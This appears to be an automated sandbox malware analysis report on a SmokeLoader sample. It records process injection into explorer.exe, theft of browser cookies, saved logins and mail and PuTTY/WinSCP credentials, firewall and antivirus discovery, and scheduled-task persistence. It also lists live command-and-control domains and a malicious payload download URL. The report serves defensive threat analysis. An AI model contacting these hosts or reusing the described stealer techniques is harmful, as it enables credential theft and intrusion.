    Source: C:\Windows\SysWOW64\explorer.exe Code function: 13_2_027A55EB cpuid 13_2_027A55EB
    Source: C:\Users\user\AppData\Local\Temp\B972.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\B972.exe Code function: 9_2_00007FF6F2D69224 GetSystemTimeAsFileTime,WaitForSingleObject,GetSystemTimeAsFileTime,TerminateProcess,WaitForSingleObject,GetExitCodeProcess, 9_2_00007FF6F2D69224
    Source: C:\Windows\SysWOW64\explorer.exe Code function: 13_2_02752198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary, 13_2_02752198
    Source: C:\Users\user\AppData\Local\Temp\B972.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Lowering of HIPS / PFW / Operating System Security Settings

    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh firewall show state
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh firewall show state
    Source: B972.exe, 00000009.00000003.3108131129.000002342E5FE000.00000004.00000020.00020000.00000000.sdmp, B972.exe, 00000009.00000003.3468731597.000002342E608000.00000004.00000020.00020000.00000000.sdmp, B972.exe, 00000009.00000003.3467979736.000002342E5FE000.00000004.00000020.00020000.00000000.sdmp, B972.exe, 00000009.00000002.4124068807.000002342E5FA000.00000004.00000020.00020000.00000000.sdmp, B972.exe, 00000009.00000003.3106981465.000002342E5F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
    Source: C:\Users\user\AppData\Local\Temp\B972.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
    Source: C:\Users\user\AppData\Local\Temp\B972.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
    Source: C:\Users\user\AppData\Local\Temp\B972.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
    Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
    Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM FirewallProduct
    Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiSpywareProduct

    Stealing of Sensitive Information

    Source: Yara match File source: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match File source: 00000012.00000002.4123114957.0000000000771000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match File source: Process Memory Space: explorer.exe PID: 5804, type: MEMORYSTR
    Source: Yara match File source: Process Memory Space: explorer.exe PID: 7524, type: MEMORYSTR
    Source: Yara match File source: 00000008.00000002.2576258561.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match File source: 00000006.00000002.2327201404.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match File source: 00000005.00000002.1977659662.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match File source: 00000006.00000002.2327352814.0000000000731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match File source: 00000000.00000002.1726176567.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match File source: 00000000.00000002.1726400088.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match File source: 00000008.00000002.2576150006.0000000001FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match File source: 00000005.00000002.1976909715.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
    Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
    Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
    Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
    Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
    Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
    Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
    Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
    Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

    Remote Access Functionality

    Source: Yara match File source: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match File source: 00000012.00000002.4123114957.0000000000771000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match File source: Process Memory Space: explorer.exe PID: 5804, type: MEMORYSTR
    Source: Yara match File source: Process Memory Space: explorer.exe PID: 7524, type: MEMORYSTR
    Source: Yara match File source: 00000008.00000002.2576258561.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match File source: 00000006.00000002.2327201404.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match File source: 00000005.00000002.1977659662.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match File source: 00000006.00000002.2327352814.0000000000731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match File source: 00000000.00000002.1726176567.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match File source: 00000000.00000002.1726400088.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match File source: 00000008.00000002.2576150006.0000000001FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match File source: 00000005.00000002.1976909715.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

    MITRE ATT&CK Matrix

    Techniques are listed per tactic column; a number in parentheses is the count shown next to that technique in the matrix.

    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
    Execution: Windows Management Instrumentation (241); Native API (12); Exploitation for Client Execution (1); Command and Scripting Interpreter (1); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
    Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
    Privilege Escalation: DLL Side-Loading (1); Process Injection (522); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
    Defense Evasion: Disable or Modify Tools (2); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); File Deletion (1); Masquerading (11); Virtualization/Sandbox Evasion (34); Process Injection (522); Hidden Files and Directories (1)
    Credential Access: OS Credential Dumping (1); Input Capture (11); Credentials in Registry (1); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
    Discovery: System Time Discovery (1); File and Directory Discovery (3); System Information Discovery (249); Security Software Discovery (891); Virtualization/Sandbox Evasion (34); Process Discovery (4); Application Window Discovery (1); System Network Configuration Discovery (1); Network Sniffing; Network Service Discovery
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
    Collection: Archive Collected Data (11); Data from Local System (1); Email Collection (1); Input Capture (11); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
    Command and Control: Ingress Tool Transfer (3); Encrypted Channel (21); Non-Application Layer Protocol (4); Application Layer Protocol (115); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
    Impact: Data Encrypted for Impact (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
    Behavior Graph

    Behavior Graph ID: 1528581; Sample: ctMI3TYXpX.exe; Startdate: 08/10/2024; Architecture: WINDOWS; Score: 100
    Domains / IPs: nwgrus.ru; ninjahallnews.com; 3 other IPs or domains
    Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures
    Processes started: ctMI3TYXpX.exe; jghruer; hdhruer; msiexec.exe

    ctMI3TYXpX.exe: Detected unpacking (changes PE section rights); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Switches to a custom stack to bypass stack traces; injects into explorer.exe
    jghruer: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
    hdhruer: Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration); Creates a thread in another existing process (thread injection)
    explorer.exe (injected): connects to nwgrus.ru 180.75.11.133, 49736, 49737, 49738 (WEBE-MY-AS-APWEBEDIGITALSDNBHDMY, Malaysia); 201.103.8.135, 50062, 50064, 50066 (UninetSAdeCVMX, Mexico); 2 other IPs or domains. Dropped: C:\Users\user\AppData\Roaming\jghruer (PE32); C:\Users\user\AppData\Roaming\hdhruer (PE32); C:\Users\user\AppData\Local\Temp\B972.exe (PE32+); 2 other malicious files. Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Injects code into the Windows Explorer (explorer.exe); 3 other signatures. Started: B972.exe; 35DB.exe; explorer.exe; 5 other processes
    B972.exe: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file; Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines); Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes). Started: cmd.exe
    35DB.exe: Antivirus detection for dropped file; Detected unpacking (changes PE section rights); Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); 4 other signatures
    explorer.exe (child): System process connects to network (likely due to code injection or exploit); Found evasive API chain (may stop execution after checking mutex); Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access)
    5 other processes: Tries to harvest and steal browser information (history, passwords, etc)
    cmd.exe: Uses netsh to modify the Windows network and firewall settings; Uses ipconfig to lookup or modify the Windows network settings; Modifies the windows firewall. Started: WMIC.exe; systeminfo.exe; net.exe; 20 other processes
    WMIC.exe: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines); Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
    net.exe: Started: net1.exe
    20 other processes: Started: net1.exe

    Source | Detection | Scanner | Label | Link
    ctMI3TYXpX.exe | 29% | ReversingLabs | |
    ctMI3TYXpX.exe | 39% | Virustotal | | Browse
    ctMI3TYXpX.exe | 100% | Avira | HEUR/AGEN.1310247 |
    ctMI3TYXpX.exe | 100% | Joe Sandbox ML | |

    Source | Detection | Scanner | Label | Link
    C:\Users\user\AppData\Roaming\jghruer | 100% | Avira | HEUR/AGEN.1310247 |
    C:\Users\user\AppData\Roaming\hdhruer | 100% | Avira | HEUR/AGEN.1310247 |
    C:\Users\user\AppData\Local\Temp\35DB.exe | 100% | Avira | HEUR/AGEN.1310247 |
    C:\Users\user\AppData\Local\Temp\B972.exe | 100% | Joe Sandbox ML | |
    C:\Users\user\AppData\Roaming\jghruer | 100% | Joe Sandbox ML | |
    C:\Users\user\AppData\Roaming\hdhruer | 100% | Joe Sandbox ML | |
    C:\Users\user\AppData\Local\Temp\35DB.exe | 100% | Joe Sandbox ML | |
    C:\Users\user\AppData\Roaming\jghruer | 29% | ReversingLabs | |
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label | Link
    https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
    https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | 0% | URL Reputation | safe |
    https://powerpoint.office.comcember | 0% | URL Reputation | safe |
    https://api.msn.com:443/v1/news/Feed/Windows? | 0% | URL Reputation | safe |
    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
    https://excel.office.com | 0% | URL Reputation | safe |
    http://schemas.micro | 0% | URL Reputation | safe |
    https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe |
    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | 0% | URL Reputation | safe |
    https://word.office.com | 0% | URL Reputation | safe |
    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | 0% | URL Reputation | safe |
    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe |
    https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
    https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
    https://android.notify.windows.com/iOS | 0% | URL Reputation | safe |
    https://api.msn.com/ | 0% | URL Reputation | safe |
    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark | 0% | URL Reputation | safe |
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | unknown
    s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | unknown
    ninjahallnews.com | 23.145.40.168 | true | true | | unknown
    nwgrus.ru | 180.75.11.133 | true | true | | unknown
    globalviewsnature.com | 23.145.40.113 | true | true | | unknown
    fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | unknown
    Name | Malicious | Antivirus Detection | Reputation
    https://23.145.40.164/ksa9104.exe | true | | unknown
    https://ninjahallnews.com/search.php | true | | unknown
    https://fallhandbat.com/search.php | true | | unknown
    IP | Domain | Country | ASN | ASN Name | Malicious
    201.103.8.135 | unknown | Mexico | 8151 | UninetSAdeCVMX | true
    23.145.40.168 | ninjahallnews.com | Reserved | 22631 | SURFAIRWIRELESS-IN-01US | true
    180.75.11.133 | nwgrus.ru | Malaysia | 38322 | WEBE-MY-AS-APWEBEDIGITALSDNBHDMY | true
    23.145.40.164 | unknown | Reserved | 22631 | SURFAIRWIRELESS-IN-01US | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1528581
Start date and time: 2024-10-08 03:13:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 43
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ctMI3TYXpX.exe (renamed because original name is a hash value)
Original Sample Name: a27775738faff754dcf5c3e8e42b9838.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@79/14@8/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 139
• Number of non-executed functions: 85
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 4.175.87.197
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ocsp.edge.digicert.com, sls.update.microsoft.com, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:14:19 | Task Scheduler | Run new task: Firefox Default Browser Agent A7BA84DA429A7AEE path: C:\Users\user\AppData\Roaming\jghruer
02:15:19 | Task Scheduler | Run new task: Firefox Default Browser Agent 32E93553152E818D path: C:\Users\user\AppData\Roaming\hdhruer
21:14:00 | API Interceptor | 366730x Sleep call for process: explorer.exe modified
21:15:37 | API Interceptor | 14x Sleep call for process: WMIC.exe modified
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
23.145.40.168 | bCnarg2O62.exe | malicious | SmokeLoader |
180.75.11.133 | HaPJ2rPP6w.exe | malicious | SmokeLoader | nwgrus.ru/tmp/index.php
180.75.11.133 | 4EtLXn5pqI.exe | malicious | SmokeLoader | 100xmargin.com/tmp/index.php
23.145.40.164 | bCnarg2O62.exe | malicious | SmokeLoader |
23.145.40.164 | BzLGqYKy7o.exe | malicious | SmokeLoader |
23.145.40.164 | UV2uLdRZix.exe | malicious | SmokeLoader |
23.145.40.164 | LKpIHL2abO.exe | malicious | SmokeLoader |
23.145.40.164 | wu5C20dPdy.exe | malicious | SmokeLoader |
23.145.40.164 | HaPJ2rPP6w.exe | malicious | SmokeLoader |
23.145.40.164 | c7v62g0YpB.exe | malicious | SmokeLoader |
23.145.40.164 | 9VgIkx4su0.exe | malicious | SmokeLoader |
23.145.40.164 | veEGy9FijY.exe | malicious | SmokeLoader |
23.145.40.164 | v173TV3V11.exe | malicious | SmokeLoader |
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context
s-part-0017.t-0009.t-msedge.net | https://starylasfe.com.de/6SZZr/ | malicious | HTMLPhisher | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | T2bmenoX1o.exe | malicious | LummaC, Vidar | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | SecuriteInfo.com.Trojan.DownLoader47.43340.12576.1316.exe | malicious | Stealc | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | bCnarg2O62.exe | malicious | SmokeLoader | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | 9Y6R8fs0wd.exe | malicious | LummaC | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | PFW1cgN8EK.exe | malicious | LummaC | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.ht.zpdzwq?v=frudxdBjlfmjfqymhfwj.ht.pjd.kwjsy___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzpiNGZlZGFhNjcxOTBhYjU4MTE5MjBlZTRiYTAxZmUwMTo3OmIxYWM6MDg1ODNlNjljZDkwNThkM2ZiM2RjYTI4MzFjZGY4NGFmMTYyZTlhYmVjYWYxY2Q4MmNkZDhiNmFmOWVkOWUxOTpoOlQ6VA#Sm9hbi5LbmlwcGVuQEVsa2F5LkNvbQ== | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exe | malicious | LummaC | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://login.stmarytx.edu/cas/logout?service=http%3A%2F%2Fgoogle.com%2Famp%2Fmatrikaengineeringworks.com/hebc/?#?m=bWVsaXNzYWdAd2Utd29ybGR3aWRlLmNvbQ== | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://dsdhie.org/dsjhem | malicious | Unknown | 13.107.246.45
nwgrus.ru | bCnarg2O62.exe | malicious | SmokeLoader | 109.175.29.39
nwgrus.ru | BzLGqYKy7o.exe | malicious | SmokeLoader | 105.197.97.247
nwgrus.ru | UV2uLdRZix.exe | malicious | SmokeLoader | 185.12.79.25
nwgrus.ru | LKpIHL2abO.exe | malicious | SmokeLoader | 197.164.156.210
nwgrus.ru | wu5C20dPdy.exe | malicious | SmokeLoader | 190.147.128.172
nwgrus.ru | HaPJ2rPP6w.exe | malicious | SmokeLoader | 177.129.90.106
nwgrus.ru | c7v62g0YpB.exe | malicious | SmokeLoader | 190.147.2.86
nwgrus.ru | 9VgIkx4su0.exe | malicious | SmokeLoader | 190.224.203.37
nwgrus.ru | veEGy9FijY.exe | malicious | SmokeLoader | 58.151.148.90
nwgrus.ru | v173TV3V11.exe | malicious | SmokeLoader | 190.219.117.240
ninjahallnews.com | bCnarg2O62.exe | malicious | SmokeLoader | 23.145.40.168
bg.microsoft.map.fastly.net | https://starylasfe.com.de/6SZZr/ | malicious | HTMLPhisher | 199.232.214.172
bg.microsoft.map.fastly.net | T2bmenoX1o.exe | malicious | LummaC, Vidar | 199.232.210.172
bg.microsoft.map.fastly.net | SecuriteInfo.com.Trojan.DownLoader47.43340.9153.30810.exe | malicious | LummaC | 199.232.210.172
bg.microsoft.map.fastly.net | http://pay.christinagstewart.com/ | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | http://hans.uniformeslaamistad.com/prog/66ce237125ba7_vjrew2ge.exe | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | http://hans.uniformeslaamistad.com/prog/66f5db9e54794_vfkagks.exe | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | h2qWqtD73F.exe | malicious | Xmrig | 199.232.214.172
bg.microsoft.map.fastly.net | SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exe | malicious | LummaC | 199.232.210.172
bg.microsoft.map.fastly.net | https://login.stmarytx.edu/cas/logout?service=http%3A%2F%2Fgoogle.com%2Famp%2Fmatrikaengineeringworks.com/hebc/?#?m=bWVsaXNzYWdAd2Utd29ybGR3aWRlLmNvbQ== | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | WiTqtf1aiE.exe | malicious | LummaC, Vidar | 199.232.214.172
globalviewsnature.com | v173TV3V11.exe | malicious | SmokeLoader | 23.145.40.113
globalviewsnature.com | file.exe | malicious | SmokeLoader | 23.145.40.113
globalviewsnature.com | file.exe | malicious | SmokeLoader | 23.145.40.113
globalviewsnature.com | file.exe | malicious | SmokeLoader | 23.145.40.113
globalviewsnature.com | file.exe | malicious | SmokeLoader | 23.145.40.113
globalviewsnature.com | file.exe | malicious | SmokeLoader | 23.145.40.113
globalviewsnature.com | file.exe | malicious | SmokeLoader | 23.145.40.113
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context
SURFAIRWIRELESS-IN-01 (US) | bCnarg2O62.exe | malicious | SmokeLoader | 23.145.40.164
SURFAIRWIRELESS-IN-01 (US) | BzLGqYKy7o.exe | malicious | SmokeLoader | 23.145.40.164
SURFAIRWIRELESS-IN-01 (US) | UV2uLdRZix.exe | malicious | SmokeLoader | 23.145.40.164
SURFAIRWIRELESS-IN-01 (US) | LKpIHL2abO.exe | malicious | SmokeLoader | 23.145.40.164
SURFAIRWIRELESS-IN-01 (US) | wu5C20dPdy.exe | malicious | SmokeLoader | 23.145.40.164
SURFAIRWIRELESS-IN-01 (US) | HaPJ2rPP6w.exe | malicious | SmokeLoader | 23.145.40.164
SURFAIRWIRELESS-IN-01 (US) | c7v62g0YpB.exe | malicious | SmokeLoader | 23.145.40.162
SURFAIRWIRELESS-IN-01 (US) | 9VgIkx4su0.exe | malicious | SmokeLoader | 23.145.40.162
SURFAIRWIRELESS-IN-01 (US) | veEGy9FijY.exe | malicious | SmokeLoader | 23.145.40.162
SURFAIRWIRELESS-IN-01 (US) | v173TV3V11.exe | malicious | SmokeLoader | 23.145.40.162
UninetSAdeCV (MX) | 0wG3Y7nLHa.elf | malicious | Mirai, Okiru | 187.145.90.104
UninetSAdeCV (MX) | XvAqhy3FO6.elf | malicious | Mirai, Okiru | 187.208.37.241
UninetSAdeCV (MX) | 970Qh1XiFt.elf | malicious | Mirai, Okiru | 187.145.90.119
UninetSAdeCV (MX) | na.elf | malicious | Unknown | 187.175.35.232
UninetSAdeCV (MX) | xd.arm.elf | malicious | Mirai | 189.128.149.6
UninetSAdeCV (MX) | na.elf | malicious | Mirai | 189.180.56.190
UninetSAdeCV (MX) | sora.arm.elf | malicious | Mirai | 187.224.224.59
UninetSAdeCV (MX) | na.elf | malicious | Mirai, Okiru | 189.177.62.126
UninetSAdeCV (MX) | na.elf | malicious | Mirai, Okiru | 189.181.178.45
UninetSAdeCV (MX) | na.elf | malicious | Mirai, Okiru | 187.202.33.19
WEBE-MY-AS-APWEBEDIGITALSDNBHD (MY) | na.elf | malicious | Mirai, Okiru | 180.75.199.20
WEBE-MY-AS-APWEBEDIGITALSDNBHD (MY) | HaPJ2rPP6w.exe | malicious | SmokeLoader |
                                                                                                                                    • 180.75.11.133
                                                                                                                                    4EtLXn5pqI.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                    • 180.75.11.133
                                                                                                                                    SecuriteInfo.com.Linux.Siggen.9999.13221.8731.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 180.73.13.64
                                                                                                                                    mdfh8nJQAy.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                    • 180.74.244.169
                                                                                                                                    firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 180.75.175.46
                                                                                                                                    firmware.i586.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 180.74.244.171
                                                                                                                                    teste.x86.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                                                                    • 120.139.129.240
                                                                                                                                    botx.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 180.73.25.29
                                                                                                                                    154.216.17.9-skid.arm5-2024-08-04T06_23_00.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                    • 180.73.37.113
Match | Associated Sample Name / URL | Detection | Threat Name | Context
72a589da586844d7f0818ce684948eea | bCnarg2O62.exe | malicious | SmokeLoader | 23.145.40.164
 | BzLGqYKy7o.exe | malicious | SmokeLoader | 23.145.40.164
 | UV2uLdRZix.exe | malicious | SmokeLoader | 23.145.40.164
 | LKpIHL2abO.exe | malicious | SmokeLoader | 23.145.40.164
 | wu5C20dPdy.exe | malicious | SmokeLoader | 23.145.40.164
 | HaPJ2rPP6w.exe | malicious | SmokeLoader | 23.145.40.164
 | c7v62g0YpB.exe | malicious | SmokeLoader | 23.145.40.164
 | 9VgIkx4su0.exe | malicious | SmokeLoader | 23.145.40.164
 | veEGy9FijY.exe | malicious | SmokeLoader | 23.145.40.164
 | v173TV3V11.exe | malicious | SmokeLoader | 23.145.40.164
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC | 23.145.40.168
 | T2bmenoX1o.exe | malicious | LummaC, Vidar | 23.145.40.168
 | file.exe | malicious | LummaC | 23.145.40.168
